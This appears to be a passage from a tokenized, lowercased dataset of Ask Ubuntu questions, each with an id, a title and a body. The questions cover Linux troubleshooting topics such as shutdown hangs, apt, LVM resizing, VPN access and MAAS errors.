file `` /usr/lib/python3/dist-packages/apport/__init__.py '' , line 5 , in < module > from apport.report import report file `` /usr/lib/python3/dist-packages/apport/report.py '' , line 30 , in < module > import apport.fileutils file `` /usr/lib/python3/dist-packages/apport/fileutils.py '' , line 23 , in < module > from apport.packaging_impl import impl as packaging file `` /usr/lib/python3/dist-packages/apport/packaging_impl.py '' , line 20 , in < module > import apt file `` /usr/lib/python3/dist-packages/apt/__init__.py '' , line 35 , in < module > apt_pkg.init ( ) systemerror : e : opening configuration file /etc/apt/apt.conf.d/00aptitude - ifstream : :ifstream ( 13 : permission denied ) , e : opening configuration file /etc/apt/apt.conf - ifstream : :ifstream ( 13 : permission denied ) original exception was : traceback ( most recent call last ) : file `` /usr/bin/software-properties-gtk '' , line 32 , in < module > import aptsources file `` /usr/lib/python3/dist-packages/aptsources/__init__.py '' , line 4 , in < module > apt_pkg.init ( ) systemerror : e : opening configuration file /etc/apt/apt.conf.d/00aptitude - ifstream : :ifstream ( 13 : permission denied ) , e : opening configuration file /etc/apt/apt.conf - ifstream : :ifstream ( 13 : permission denied ) it seems to me that some authorization protocols have been removed since i do n't get the window prompting for a password .
441757	how do i access the dropbox proprieties and choose the folders i want to sync ?	my ubuntu partition has 60gb while my dropbox account has 35gb . i do n't want to sync all the dropbox folders , just one of them . do somebody know how i access the dropbox proprieties to choose the folder i want to sync ? i remember that in windows i would go to the dropbox icon , next to the clock , then a right click , access the proprieties and then i could choose which folders i 'd like to sync . i feel bad to ask this , it was supposed to be simple and i ca n't find any solution online . thanks in advance .
441762	ca n't shut down lubuntu	hello , i 'm still hoping for some suggestions . i should add the fact that when i put the computer to sleep , it is unable to wake up again . so , i have to hold the power button down to turn it off . hopefully that will help give you an idea of what is wrong . thanks so much for any assistance . i would appreciate your help in shutting my computer down . when i shut down with the gui or with the terminal , it always gets stuck at the lubuntu splash screen with the 5 dots . i always have to hold down the power button . i 'm afraid this will mess up my lubuntu installation . i have a compaq presario 2195us . 448 mb of ram . athlon xp 2500+ processor . lubuntu 13.10 . thank you very much i have already tried the below ideas : http : //ubuntuforums.org/showthread.php ? t=2107235 http : //mylinuxexplore.blogspot.com/2011/11/solved-ubuntu-doesnt-shutdown-properly.html http : //ubuntuforums.org/showthread.php ? t=2116032
441763	can i make all commands have feedback if they 've worked or not worked ?	sometimes when i run commands it does n't display an output , so i 'm not sure if they 've worked or not . is it possible to make all commands have feedback if they 've ran correctly or not ? or at the bare minimum to display feedback id they 've ran ( correcly or not )
441766	new user only rwx one directory	so , i read this : is it possible to create users that can only use one directory ? i would like to make it where my newly created user `` kevin '' ( to keep in theme with the referenced post ) can not rwx in any folder on my system other than a single folder i have set aside for him . i 'm building a bottle server on my machine and would like to limit the resources `` kevin '' may access to the things in his folder . i do n't want anyone being able to gain access to anything by working any programming magic on the system .
441767	how to extract/inject id3 tags via bash ?	i have a huge collection of mp3 files that have id3 metadata . is it possible to extract existing tags and images to plain text ( e.g . json , xml ) ? can i inject from plain text to mp3 file ? how can i do that only via-command-line
441768	install ubuntu over windows with 4 partitions,	i want install ubuntu on a laptop with 3 physical partitions and 1 logical . c : windows d : restore e : hp tools i tried wubi for 2 months and id like try a full intall , but on tutorials i see peoeple create a `` swap area '' ( for dual boot , cant do a dual cuz already have 4 partitions ) , i want install ubuntu 12.04 over my windows partition , `` will i need the swap area ? . i want keep my restore partitions and unlucky i need both hp and restore and im not sure about that last logical partition ( its only visible when i try install ubuntu ) . and can some1 tell games performance on ubuntu 12.04 i have dota 2 and l4d2 on steam and want play em on ubuntu , all i use is a video converter and thse 2 games .
441772	how to uninstall counter strike source and steam on ubuntu 13.10 ?	i have installed steam and then i installed counter strike source from steam . but now i 'm not able to figure out how to uninstall counter strike source . i ca n't find it on package manager or software center , or where it has been installed . however , i can find steam on software center to uninstall it . i want to delete all files related to counter strike source , so that next time if i install it , it would n't keep the settings from previous installation . please help me with this . thank you .
441773	computer wo n't shutdown ?	i just installed xubuntu 13.10 on a gateway mx3216 laptop . amongst other problems i 'm facing ( wifi , graphics , etc ) , the machine wont shutdown . it goes to the blue xubuntu screen and just thinks . any ideas ?
441774	ie8 installation using playonlinux	when i try to install internet explorer 8 through playonlinux , it requires service pack 3 ( sp3 ) , but the sp3 file is a very large file to download , about 326mb . can i install sp3 manually ? please suggest another way to install ie8 .
441781	ca n't access drives with persistent liveusb	due to windows 7 boot error i 've decided to make a liveusb as a possible fix method . i used a 4 gb usb stick and dedicated 1 gb as persistent . on first boot everything was fine but from the second boot onwards i have n't been able to access any of the 'drives ' . that includes both hard drives ( one is malfunctioning anyway but that 's another story ) , the two windows partitions and even casper . i can access an sd stick only if it was present during boot . if i remove and reinsert it , i get an error message . when trying to access the main windows partition i get this error message : error mounting /dev/sdb2 at /media/ubuntu/windows7_os : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=999 , gid=999 , dmask=0077 , fmask=0177 '' `` /dev/sdb2 '' `` /media/ubuntu/windows7_os '' ' exited with non-zero exit status 21 : mount : according to mtab , /dev/sdb2 is already mounted on /media/ubuntu/windows7_os this is like with the two other hdd partitions/drives , only with different locations . for casper i get : device /dev/loop1 is already mounted at `/media/ubuntu/casper-rw3 ' . when loading the live usb i 've tried `` check disc for errors '' and it found two errors . it did n't tell me what those were and it did n't seem to fix/change anything , since it gave me the same message the second time i ran `` check disc for errors '' . how can i regain access ? update : it 's been over a week now and still no improvement , things are just getting worse . since the system seems to have problem accessing the persistent partition on the usb flash drive , various changes can not be saved properly , like firefox crash screen ( and other various crashes when hdmi cable is plugged/unplugged ) . is there anything i can do besides a reinstall of the liveusb ?
441784	lshw command gives no output	my nic is operating just fine . i am connected via ethernet right now to a switch on my router and using the internet . however , i came across this online documentation https : //help.ubuntu.com/10.04/serverguide/network-configuration.html it states : another application that can help identify all network interfaces available to your system is the lshw command . in the example below , lshw shows a single ethernet interface with the logical name of eth0 along with bus information , driver details and all supported capabilities . however , when i try to emulate the behavior on my machine , i get a blinking cursor followed by a string 'pci ( sysfs ) ' . and then that 's it . it returns control to terminal . nothing happens . no information is given as described in documentation . what may i be doing wrong ?
441786	ca n't click on text fields	i 'm having this weird problem with my ubuntu since i bought a new laptop , sometimes without any clear reason it does n't let me click on any text field and nowadays i saw that i ca n't click on the top bar of my window or in the logo to open dash . is there any way to solve that ? i 'm using ubuntu 12.04 .
441787	how can i go from hosting locally to being internet accessable ?	i have a server that is hosting a `` shiny '' app using shiny-server . i can host locally where my address looks like : http : //charles-p-7805u:3838/histogram/ or http : //127.0.0.1:3838/histogram/ how can i make this hosted on the internet ? sorry for the general and possibly vague question but i 'm not very educated . my intuition says that i could have others connect to my ip and port if i could make them public . is this incorrect ? thanks a bunch . working with 12.04 . please ask for any clarification if i missed any important details to mention .
441788	wifi internet help needed	i am new to ubuntu . for a few minutes after turning on my laptop the internet will work , and then it will disconnect . it normally stays connected for 5-15 minutes , then it will disconnect and i wo n't be able to connect unless i restart the laptop . someone please help ! ! ! ! thank you . i tried following the instructions in the answer to this question : how do i get a ralink rt3290 wireless card working ? by luis alvarado , but it did n't work . 00:00.0 host bridge [ 0600 ] : advanced micro devices , inc. [ amd ] family 15h ( models 10h-1fh ) processor root complex [ 1022:1410 ] 00:01.0 vga compatible controller [ 0300 ] : advanced micro devices , inc. [ amd/ati ] richland [ radeon hd 8550g ] [ 1002:990d ] 00:01.1 audio device [ 0403 ] : advanced micro devices , inc. [ amd/ati ] trinity hdmi audio controller [ 1002:9902 ] 00:04.0 pci bridge [ 0604 ] : advanced micro devices , inc. [ amd ] family 15h ( models 10h-1fh ) processor root port [ 1022:1414 ] 00:10.0 usb controller [ 0c03 ] : advanced micro devices , inc. [ amd ] fch usb xhci controller [ 1022:7814 ] ( rev 09 ) 00:10.1 usb controller [ 0c03 ] : advanced micro devices , inc. [ amd ] fch usb xhci controller [ 1022:7814 ] ( rev 09 ) 00:11.0 sata controller [ 0106 ] : advanced micro devices , inc. [ amd ] fch sata controller [ ahci mode ] [ 1022:7804 ] 00:12.0 usb controller [ 0c03 ] : advanced micro devices , inc. [ amd ] fch usb ohci controller [ 1022:7807 ] ( rev 11 ) 00:12.2 usb controller [ 0c03 ] : advanced micro devices , inc. [ amd ] fch usb ehci controller [ 1022:7808 ] ( rev 11 ) 00:13.0 usb controller [ 0c03 ] : advanced micro devices , inc. [ amd ] fch usb ohci controller [ 1022:7807 ] ( rev 11 ) 00:13.2 usb controller [ 0c03 ] : advanced micro devices , inc. [ amd ] fch usb ehci controller [ 1022:7808 ] ( rev 11 ) 00:14.0 smbus [ 0c05 ] : advanced micro devices , inc. [ amd ] fch smbus controller [ 1022:780b ] ( rev 16 ) 00:14.2 audio device [ 0403 ] : advanced micro devices , inc. [ amd ] fch azalia controller [ 1022:780d ] ( rev 01 ) 00:14.3 isa bridge [ 0601 ] : advanced micro devices , inc. [ amd ] fch lpc bridge [ 1022:780e ] ( rev 11 ) 00:14.4 pci bridge [ 0604 ] : advanced micro devices , inc. [ amd ] fch pci bridge [ 1022:780f ] ( rev 40 ) 00:15.0 pci bridge [ 0604 ] : advanced micro devices , inc. [ amd ] hudson pci to pci bridge ( pcie port 0 ) [ 1022:43a0 ] 00:15.1 pci bridge [ 0604 ] : advanced micro devices , inc. [ amd ] hudson pci to pci bridge ( pcie port 1 ) [ 1022:43a1 ] 00:15.3 pci bridge [ 0604 ] : advanced micro devices , inc. [ amd ] hudson pci to pci bridge ( pcie port 3 ) [ 1022:43a3 ] 00:18.0 host bridge [ 0600 ] : advanced micro devices , inc. [ amd ] family 15h ( models 10h-1fh ) processor function 0 [ 1022:1400 ] 00:18.1 host bridge [ 0600 ] : advanced micro devices , inc. [ amd ] family 15h ( models 10h-1fh ) processor function 1 [ 1022:1401 ] 00:18.2 host bridge [ 0600 ] : advanced micro devices , inc. [ amd ] family 15h ( models 10h-1fh ) processor function 2 [ 1022:1402 ] 00:18.3 host bridge [ 0600 ] : advanced micro devices , inc. [ amd ] family 15h ( models 10h-1fh ) processor function 3 [ 1022:1403 ] 00:18.4 host bridge [ 0600 ] : advanced micro devices , inc. [ amd ] family 15h ( models 10h-1fh ) processor function 4 [ 1022:1404 ] 00:18.5 host bridge [ 0600 ] : advanced micro devices , inc. [ amd ] family 15h ( models 10h-1fh ) processor function 5 [ 1022:1405 ] 01:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 0c ) 04:00.0 network controller [ 0280 ] : ralink corp. rt3290 wireless 802.11n 1t/1r pcie [ 1814:3290 ] 04:00.1 bluetooth [ 0d11 ] : ralink corp. rt3290 bluetooth [ 1814:3298 ] 05:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5229 pci express card reader [ 10ec:5229 ] ( rev 01 )
441793	why apt-get does not ask permission to continue before installing small packages ?	when we try to install applications using sudo apt-get install command , we are asked for permission before installing as follows , need to get 9,979 kb/11.6 mb of archives . after this operation , 36.8 mb of additional disk space will be used . do you want to continue [ y/n ] ? but this happens only for packages above certain size ( it 's somewhere about 100 kb , but i 'm not sure ) . for small packages it skips this step . why is it so ? can i force apt-get to show the message on installation of all packages ?
441794	how to increase the size of lvm partition on headless system ?	i have a 320gb hdd and becoming full , and got a new 1tb hdd and wished to migrate everything to it . i am using lvm . i cloned the hard disk using dd , and extended /dev/sda2 to maximum available space . and here is the extract of fdisk -l results : device boot start end blocks id system /dev/sda1 * 2048 499711 248832 83 linux /dev/sda2 501758 1953523711 976510977 5 extended partition 2 does not start on physical sector boundary . /dev/sda5 501760 625141759 312320000 8e linux lvm and pvdisplay shows the following : -- - physical volume -- - pv name /dev/sda5 vg name ubuntu pv size 297.85 gib / not usable 3.81 mib allocatable yes pe size 4.00 mib total pe 76249 free pe 4 allocated pe 76245 pv uuid ugxru9-d6d3-67ri-xjnq-nhh5-x9bz-1bdldm i tried to use parted but it failed to recognise the file system ; results extracted as follows : ( parted ) resize warning : you are attempting to use parted to operate on ( resize ) a file system . parted 's file system manipulation code is not as robust as what you 'll find in dedicated , file-system-specific packages like e2fsprogs . we recommend you use parted only to manipulate partition tables , whenever possible . support for performing most operations on most types of file systems will be removed in an upcoming release . partition number ? 5 start ? [ 256901120b ] ? end ? [ 320072580608b ] ? 1000204136448b error : could not detect file system . is there any way that i can extend sda5 to maximum space available , preferably with steps that could be run from remote terminal ? thanks . ( i understand i can create a new lvm partition as sda6 and add that in the same vg but i do n't prefer doing so ... simply too ugly . )
441795	r software installation sudo apt-get install r	how to install r software in ubuntu using terminal codes . i tried using sudo apt-get install r ?
441799	ambiguous disk usage statistics on ec2	i got the following problem : df -h shows : ubuntu @ : ~ $ df -h filesystem size used avail use % mounted on /dev/xvda1 32g 9.6g 21g 33 % / udev 819m 12k 819m 1 % /dev tmpfs 331m 200k 331m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 827m 0 827m 0 % /run/shm here i can see that i have 21gb available in the 32g / partition . however , when i try df -i i get ubuntu @ : ~ $ df -i filesystem inodes iused ifree iuse % mounted on /dev/xvda1 2097152 2096964 188 100 % / udev 209564 382 209182 1 % /dev tmpfs 211573 274 211299 1 % /run none 211573 4 211569 1 % /run/lock none 211573 1 211572 1 % /run/shm here i see the usage is 100 % . i 'm not sure why the usage is shown differently in both . secondly the /root folder looks very strange to me : ubuntu @ : / $ ls -al total 132240 drwxr-xr-x 24 root root 4096 jan 8 15:04 . drwxr-xr-x 24 root root 4096 jan 8 15:04 .. drwxr-xr-x 2 root root 4096 mar 27 2013 bin drwxr-xr-x 3 root root 4096 mar 21 2013 boot drwx -- -- -- 5 root root 135319552 apr 1 14:11 root drwxr-xr-x 18 root root 640 apr 1 14:03 run drwxr-xr-x 2 root root 4096 mar 27 2013 sbin why the size of the root directory is so huge ? if i go into the /root directory and type in ls the terminal does not even respond . so i 'm confused with this . any suggestions will be helpful . thanks .
441802	reprepro no section given for 'galera ' , skipping	i 'm trying to create a local repository using reprepro . below are the steps and folder structure . i have created a directory name my_repo . directory structure : my_repo/ conf/ -- > distributions -- > override -- > override.precise.extra.main -- > override.precise.main -- > override.precise.main.debian-installer distributions -- -- -- -- -- -- -- -- -- -- -- origin : ubuntu label : ubuntu codename : precise suite : stable version : 12.04 architectures : amd64 i386 components : main deboverride : override udebcomponents : main description : gui-installer cd mirror signwith : yes pull : precise then i gave the command below to add the debian : `reprepro -v -b my_repo/ -c main includedeb precise galera_23.2.2_amd64.deb` then it is failing to add the debian by giving the error below : no section given for 'galera ' , skipping . any pointers on this will be helpful
441803	how to restore a svn reverted file in ubuntu	i did some changes to some of the files checked out from a svn repo and mistakenly did a svn revert and all my changes was gone . is there a way to restore my changes back ?
441804	strange e1550 dongle behavior , initialized only if loaded in windows previously	i 'm a new user of ubuntu , and connect to internet via huawei e1550 dongle ( usb modem ) . i also have a windows os like a second one ( dual boot ) on my laptop . so yesterday i login to windows , do some stuff .. then re-login to linux and dongle started working again . so i do some stuff , then suspend the system and go sleeping . this morning i open laptop , but it was no connection . i try to re-plugging dongle , reboot the linux , suspending , but all that stuff was useless . so i reboot it once again , go to windows , connect to internet , then again reboot to ubuntu and now dongle work again . so , why is that strange ? and what should i do to be able use dongle in ubuntu without previously loading windows ? lsusb output for device when working as a modem is like that : bus 003 device 002 : id 12d1:1001 huawei technologies co. , ltd. e169/e620/e800 hsdpa modem when i re-plugging it , it stop working again and lsusb input change to this : bus 003 device 012 : id 12d1:1446 huawei technologies co. , ltd. e1552/e1800 ( hspa modem ) so it makes me once again reload to windows and then go back to ubuntu to be able to connect to internet .
441806	security benefits to force users to change their password at first login	when i consider chage command , i found that i can force users to change their password at first login with following command : $ sudo chage -d 0 < user-account > has this work any security benefits for the system ?
441807	how to get sub-string for a string using pattern analysis ?	i want to get sub-string of any string using pattern analysis . example string : < string module name= '' jai '' fathername= '' s.s. khan '' phone= '' 1234 '' > < address complete= '' startz us '' / > < worker company= '' delta star '' / > < string module name= '' jai '' phone= '' 1234 '' > < string module name= '' jai '' value= '' '' phone= '' 1234 '' > < status now= '' single / > < string module name= '' jai '' email= `` jai @ email.com '' value= '' '' phone= '' 1234 '' > < address complete= '' startz us '' / > < worker company= '' delta star '' / > i want the following values ( greped by phone ) : string module name= '' jai '' fathername= '' s.s. khan '' string module name= '' jai '' string module name= '' jai '' value= '' '' string module name= '' jai '' email= `` jai @ email.com '' value= '' '' if i run the following command it returns only those rows which have phone : cat file.txt | grep phone . to overcome this i am running : cat file.txt | grep phone | sed 's/phone= '' . * '' /phone= '' '' /g ' | grep -v phone` it works but i want to do this with exactly pattern analysis . can anyone help or guide me how can i do so ?
441810	redefine screen split ratios	i 'm not sure of the best way to ask this question because i do n't know the correct terminology for what i 'm asking about . when i drag a window to the edge of my screen it automatically resizes to occupy half the width of the monitor . same with the function key + left/right arrow . they both make the window resize to a 50/50 split for each side . now , i have a 26 '' monitor and i find the best setup when coding is a text editor taking up 75 % of the width with a terminal taking up the other 25 % . is it possible to somehow make it so when i drag against the right side , the window resizes to the right 25 % of the monitor , and against the left side the window resizes to 75 % ? surely the 50/50 ratio must be stored somewhere ? can i just edit that to be 25/75 ? or an arbitrary ratio ?
441811	sift not installed	i 'm a newbie in linux . recently i 'm using a program named sift which should be an executable file which can run directly . but when i cd to that directory and run the file , it complains the software is not installed . this also brought several questions i had before : how can i solve this problem ? where exactly should i install other programs except like apt-get ? is it a good idea to install on your disk ? thanks in advance !
441812	error installing savanna - command not found	i have followed tutorial from here to install openstack from here , now i want to install savanna , i am following from here but when i execute this command savanna-venv/bin/python savanna-venv/bin/savanna-db-manage -- config-file savanna-venv/etc/savanna.conf upgrade head it says command not found ! how to solve the problem ? another question is that can anyone guide me to configure savanna.conf file ?
441813	how to stop downgrading while installing from deb	i used to install deb packages by using command : dpkg -i *.deb as all deb 's are in same folder . sometimes dpkg shows warning of downgrading dependencies to lower version . because later version already installed . so , how to stop downgrading ( skip that package to install ) so that higher version remain installed . gdebi shows warning and stops from installing . but it is limited to handle single deb at a time . so is there any command ( dpkg -- ? ) to skip that package while group of debs installing ? or give me antother method to install . ( synaptic add downloaded files option not working well in offline )
441814	touble create apache virtual host	i have 000-default.conf in /etc/apache2/sites-available . i want to create a new virtual host myserver . so i duplicate 000-default.conf and rename it 000-myserver.conf . inside this file : # namevirtualhost *:80 < virtualhost *:80 > servername myserver serveradmin webmaster @ myserver documentroot /home/user479/myserver/www errorlog $ { apache_log_dir } /error.log customlog $ { apache_log_dir } /access.log combined < /virtualhost > then on terminal i restart apache and run $ sudo a2ensite myserver . but it gives me this error : error : site dropbox does not exist !
441821	login goes nowhere after upgrade to 13.10	after upgrading to xubuntu 13.10 i rebooted once and found that after login , regardless of account , i end up stuck after the login window disappears , with a movable pointer and the background from the login screen . i am running ecryptfs on the main account 's home partition but even the guest login yields the same result . what do i need to fix this ? ( i can reach a text terminal so i can post logs on request . ) ( i 've tried this question 's solution to no effect : ca n't login after upgrade ) reinstalling lightdm and xubuntu-desktop also had no effect .
441822	i installed wubi and only windows starts , ubuntu shows an error message	when i choose ubuntu in the screen , this message appears : windows boot manager windows was n't initialized correctly . file : \ubuntu\winboot\wubildr.mbr and then the computer shuts down . i created a new partition to do the instalation . i 'm afraid that is the problem . it 's strange to install ubuntu in the c : windows partition , but the option was there . thanks for your time .
441826	lg-l38c wo n't send files to samsung sch-s738c	why wont my lg-l38c send files via bluetooth to a samsung sch-s738 ? it says either `` cancelled by user '' , or `` connection failure '' , but its lt shows i 'm paired , but not connected .
441828	up arrow unresponsive in xubuntu 12.04 after resuming from suspend	in xubuntu 12.04 i 'm facing an issue where ( occasionally ) the keyboard lay-out is changed after resuming from suspend to ram . as this only happens sporadically , i have n't figured out what causes it ( yet ) . however , a solution when it does happen is quite simple : setxkbmap -rules evdev -layout us -model pc105 this fixes the keyboard map , but for some reason my up arrow remains unresponsive in x . the key is only unresponsive in the x session , when switching to e.g . tty6 the up arrow works fine . this the output i get when running xev and pressing the up arrow : focusout event , serial 32 , synthetic no , window 0xa600001 , mode notifygrab , detail notifyancestor focusout event , serial 32 , synthetic no , window 0xa600001 , mode notifyungrab , detail notifypointer focusin event , serial 32 , synthetic no , window 0xa600001 , mode notifyungrab , detail notifyancestor keymapnotify event , serial 32 , synthetic no , window 0x0 , keys : 4294967247 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 i 'd guess xfce has bound the up arrow to something else , however i ca n't figure out what it is as it does n't show in the keyboard settings nor in the windowmanager settings . xfce4-settings-editor does n't show anything suspicious either . i 'm running xfce 4.10 any thoughts ?
441830	lighttpd compilation error in the file configfile.c	while iâm trying to install lighttpd i get the following error : '' ( configfile.c.1003 ) opening configfile /etc/lighthttpd/lighttpd.conf failed : no such file or directory '' so what is solution ?
441831	ubutnu server 12.04 vpn with pptpd can not access internet on clients	i have recently completed a fresh install of ubuntu server 12.04.2 32 bit . i have installed and set up pptpd for my server . my server is behind a consumer grade netgear dgn2200v4 router with port 1723 open . i can connect to the server vpn fine using my android smartphone on a mobile data connection , the vpn connects and i can ftp and ssh into the server of the vpn connection . the only thing which i can not access is websites or internal websites hosted on the same server as pptpd or my router 's web interface . the router is an adsl modem , its ip address is 192.168.0.1 , and my server 's internal ip is 192.168.0.254 i have followed a couple of guides on the web , particularly this one where it starts talking about how to set up pptpd . hope you can help .
441834	clock dissapeared from menu	as you can see from the screenshot , i am missing date and time from top menu . is it stupid april fools joke or ... ? i am clueless how to put it back . any help would be appreciated . edit tried the proposed solution from the comments : sudo apt-get install indicator-datetime gives me : indicator-datetime is already the newest version . when i paste as normal user the command for the clock : janipav @ janipav-energy : ~ $ /usr/lib/indicator-datetime/indicator-datetime-service gives me bash : /usr/lib/indicator-datetime/indicator-datetime-service : no such file or directory
441835	how to download setup of any software for ubuntu 13.10 on window xp	i am very new to ubuntu and i am just a beginner . i have an ubuntu computer ( 13.10 ) , without an internet connection . on another computer ( xp ) i do have an internet connection , and i would like to know how i can download software for the ubuntu computer and prepare it on a pendrive , so i can install it on the ubuntu computer . please tell step by step how can do that . thanks
441840	system running very lagish and slow-responding	the system is very slow to respond , and wherever i click , the window appears slowly ( almost as if its transparency is reduced ) . the specification is : -os : ubuntu 13.1 32-bit -memory : 1gb -processor : intel pentium ( r ) 4 cpu 3.2ghz x 2 -graphics : nvidia geforce fx5500 -hdd : 60 or something gb ( only showing 32gb in system information ) i installed ubuntu over windows xp by booting from flash . ( this might be the cause of the 32gb hdd issue.. ? ) in the system monitor both cores are at 80 % at average . this is without having any windows open whatsoever.. what could be the problem ? how can i speed things up ?
441842	what are the various files at cdimage.ubuntu.com daily builds ?	on http : //cdimage.ubuntu.com/daily-live/current/ there are various files . they can be categorized by two ways . architecture i386 amd64 amd64+mac extension of file .oversized .manifest .metalink .list .iso .iso.zsync i 'm sure about the arch , but what do the various extensions mean ? how are they meant to be used ?
441843	is there a way to cheat javascript games ( like unicoin mining ) where rapid clicking is required ?	i saw that there 's a new currency on the site today for higher privileges called unicoin . you can mine them by clicking quickly . i was wondering if there 's any ubuntu wizardry that could speed up the process of mining these coins ( and by extension to prove that ubuntu is better than windows ) . any help appreciated . index finger is getting tired .
441845	read only filesystem problem	i created a folder and i did : chmod 777 anotherfolder/ i ran : sudo mount -o loop folder/isoimage.iso anotherfolder/ the permissions of anotherfolder/ changed to `` read only '' and i can not chmod it back to 777 , even with sudo . how can i chmod it to 777 ? it outputs me : read only file system . i checked during 2 days in several forums but in vain : (
441853	how to create a mountable iso image file	how can i create an iso image file of my ubuntu system which i can install later ? i used remastersys , but it created me only a live version . when i tried the install option on the generated iso image file it acted as a live version whilst i need to install it on an other computer .
441854	failed login to ubuntu 12.04.4	i ca n't log into ubuntu 12.04.4 on my laptop , it goes into ( ash ) without finding the root directory . i tried to log in with ctrl+alt+f6 but get a blank screen . i have a ubuntu 12,04.3 disk but am not sure what to do now .
441856	problem playing itunes music in banshee	i have copied all my music files into banshee . these were located on my itunes when i was using windows . when i try to play in banshee , it states that i do not have the correct codec . i have tried to find a way to delete the files without success and i have tried to find a solution on the web . i am not very computer savvy so can anyone help me out so i can play my music please ?
441858	how to make openvpn to accessible to specific user only in shred ubuntu system	i am using openvpn client to access remote server on a shred ubuntu system but while i am connected to vpn using openvpn client , other users of the shared ubuntu system are also able to access that remote server .
441859	start xbmc automatically for specific user	this is my first post on ask ubuntu and i have only been using ubuntu as an os for a week or so . so far , loving is : d but onto the problem . basically i am wanting to set up a couple of user accounts on my laptop , 1 for xbmc and the other for using ubuntu normally . i am using ubuntu saucy salamander . so for example if i have 2 users , here is what i want them to do : xbmc - boot directly into xbmc upon login user - run ubuntu as normal . i 'm not sure if this is possible but i imagine it would be . any help would be very appreciated : ) thanks , rob
441865	no sound through usb head phones	i 'm using ubuntu 12.04 lts with asus hs-w1 usb head phones . when plugging in the usb device and turning on the phones they `` find '' each other but there is no sound . thank you
441866	move a file and all of its symlinks	for the icon themes i 'm developing , i have different files with a different number of symlinks placed in different folders . here is an example of one of them : flatwoken/flatwoken/scalable/apps $ find -l ../ -samefile bluetooth-active.svg ../stock/stock_bluetooth.svg ../status/bluetooth-active.svg ../status/blueman-active.svg ../apps/bluetooth-active.svg ../apps/blueradio-48.svg ../apps/bluetooth.svg ../apps/bluedun.svg ../apps/bluetoothradio.svg ../apps/preferences-system-bluetooth.svg ../apps/blueman.svg what i would like to do is to find out a terminal command that is able to move all of them in a new folder ( let 's say , flatwoken/flatwoken/24x24 ) , without loosing the symlinks ( i.e . flatwoken/flatwoken/24x24/apps/bluedun.svg should symlink to flatwoken/flatwoken/24x24/apps/bluetooth-active.svg ) . is it possible to do so ? for more clarification , if i have this structure : alecive @ calliope : ~/scrivania/temp $ ls * dest : a orig : a b c alecive @ calliope : ~/scrivania/temp $ ls -l orig/* orig/a : totale 0 lrwxrwxrwx 1 alecive alecive 8 apr 9 10:22 link_a - > truefile -rw-rw-r -- 1 alecive alecive 0 apr 9 10:22 truefile orig/b : totale 0 lrwxrwxrwx 1 alecive alecive 13 apr 9 10:23 link_b - > ../a/truefile orig/c : totale 0 lrwxrwxrwx 1 alecive alecive 13 apr 9 10:23 link_c - > ../a/truefile alecive @ calliope : ~/scrivania/temp $ ls -l dest/* dest/a : totale 0 -rw-rw-r -- 1 alecive alecive 0 apr 9 10:24 truefile dest/b : totale 0 dest/c : totale 0 i would like to fill the dest folder with the symlinks that point to dest/a/truefile ( and not orig/a/truefile ) , without using the absolute path but only the relative path . thanks in advance for any help !
441870	i get internal server error when trying to connect the maas gui in a fresh installation on 12.04	sudo service avahi-daemon start did n't help [ tue apr 01 09:43:31 2014 ] [ error ] [ client 10.223.8.30 ] dbusexception : org.freedesktop.dbus.error.filenotfound : failed to connect to socket /var/run/dbus/system_bus_socket : no such file or directory [ tue apr 01 12:16:45 2014 ] [ error ] [ client 10.223.8.30 ] mod_wsgi ( pid=32212 ) : target wsgi script '/usr/share/maas/wsgi.py ' can not be loaded as python module . [ tue apr 01 12:16:45 2014 ] [ error ] [ client 10.223.8.30 ] mod_wsgi ( pid=32212 ) : exception occurred processing wsgi script '/usr/share/maas/wsgi.py ' . [ tue apr 01 12:16:45 2014 ] [ error ] [ client 10.223.8.30 ] traceback ( most recent call last ) : [ tue apr 01 12:16:45 2014 ] [ error ] [ client 10.223.8.30 ] file `` /usr/share/maas/wsgi.py '' , line 30 , in < module > [ tue apr 01 12:16:45 2014 ] [ error ] [ client 10.223.8.30 ] start_up ( ) [ tue apr 01 12:16:45 2014 ] [ error ] [ client 10.223.8.30 ] file `` /usr/lib/python2.7/dist-packages/maasserver/start_up.py '' , line 59 , in start_up [ tue apr 01 12:16:45 2014 ] [ error ] [ client 10.223.8.30 ] inner_start_up ( ) [ tue apr 01 12:16:45 2014 ] [ error ] [ client 10.223.8.30 ] file `` /usr/lib/python2.7/dist-packages/maasserver/start_up.py '' , line 81 , in inner_start_up [ tue apr 01 12:16:45 2014 ] [ error ] [ client 10.223.8.30 ] setup_maas_avahi_service ( ) [ tue apr 01 12:16:45 2014 ] [ error ] [ client 10.223.8.30 ] file `` /usr/lib/python2.7/dist-packages/maasserver/maasavahi.py '' , line 52 , in setup_maas_avahi_service [ tue apr 01 12:16:45 2014 ] [ error ] [ client 10.223.8.30 ] service.publish ( ) [ tue apr 01 12:16:45 2014 ] [ error ] [ client 10.223.8.30 ] file `` /usr/lib/python2.7/dist-packages/maasserver/maasavahi.py '' , line 44 , in publish [ tue apr 01 12:16:45 2014 ] [ error ] [ client 10.223.8.30 ] self.service.publish ( ) [ tue apr 01 12:16:45 2014 ] [ error ] [ client 10.223.8.30 ] file `` /usr/lib/python2.7/dist-packages/maasserver/zeroconfservice.py '' , line 44 , in publish [ tue apr 01 12:16:45 2014 ] [ error ] [ client 10.223.8.30 ] bus = dbus.systembus ( ) [ tue apr 01 12:16:45 2014 ] [ error ] [ client 10.223.8.30 ] file `` /usr/lib/python2.7/dist-packages/dbus/_dbus.py '' , line 194 , in __new__ [ tue apr 01 12:16:45 2014 ] [ error ] [ client 10.223.8.30 ] private=private ) [ tue apr 01 12:16:45 2014 ] [ error ] [ client 10.223.8.30 ] file `` /usr/lib/python2.7/dist-packages/dbus/_dbus.py '' , line 100 , in __new__ [ tue apr 01 12:16:45 2014 ] [ error ] [ client 10.223.8.30 ] bus = busconnection.__new__ ( subclass , bus_type , mainloop=mainloop ) [ tue apr 01 12:16:45 2014 ] [ error ] [ client 10.223.8.30 ] file `` /usr/lib/python2.7/dist-packages/dbus/bus.py '' , line 122 , in __new__ [ tue apr 01 12:16:45 2014 ] [ error ] [ client 10.223.8.30 ] bus = cls._new_for_bus ( address_or_type , mainloop=mainloop ) [ tue 